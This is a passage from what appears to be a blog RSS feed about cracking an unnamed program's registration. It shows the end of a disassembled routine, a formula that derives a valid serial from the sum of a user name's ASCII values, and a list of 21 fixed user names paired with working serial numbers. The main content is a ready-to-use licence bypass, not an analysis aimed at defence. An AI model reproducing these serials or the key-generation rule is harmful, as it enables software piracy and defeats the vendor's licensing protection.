004B0606   .  5E            pop     esi<br />
004B0607   .  5B            pop     ebx<br />
004B0608   .  8BE5          mov     esp, ebp<br />
004B060A   .  5D            pop     ebp<br />
004B060B   .  C3            retn</p>
<p>The user names are stored in an array and are fixed; as long as</p>
<p>serial number = (sum of the user name's ASCII values * 0x0bb790 + 0x314) / 2</p>
<p>registration succeeds.</p>
<p>The user names and registration codes are as follows:</p>
<p>User name:                                            Serial number:<br />
VqhfwqY-VI3fg486                     517556906<br />
Perf7gJ-T8ydwt86                       529843114<br />
tawer98-SYrw3w76                    533298610<br />
TqervDR-S1e2feP6                       516405074<br />
OafegD6-LVrs5eU1                      509878026<br />
Taqevq9-S7el9qT1                       529075226<br />
rdgtrp6-ZV1m8ynN                     559406802<br />
BqredCw-VQvWVdB1                  536754106<br />
BsdewfA-VKmVBaB1                   517172962<br />
BMertyD-VAwkEBKB                   522548178<br />
Ouijnsr-AKzO0u47                      539057770<br />
Oftyuf8-KO109vf1                        504886754<br />
iknfEML-VKdiMPO1                     515253242<br />
Ipdwwa6-VEJ6yvU1                   527923394<br />
IgvcdJT-BBYsrYX1                     526771562<br />
DawqaUl-tqeLwlV1                      575916394<br />
SsegbT6-DVlrmf99                      531378890<br />
erswqwS-AKfnlp41                      569005402<br />
SweNrvQ-TTdtgjN1                     560174690<br />
gaeuprE-MIrgbnN3                    561326522<br />
ZsfdeS6-M9ofvpN3                     535986218</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lingdux.com/2010/169.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

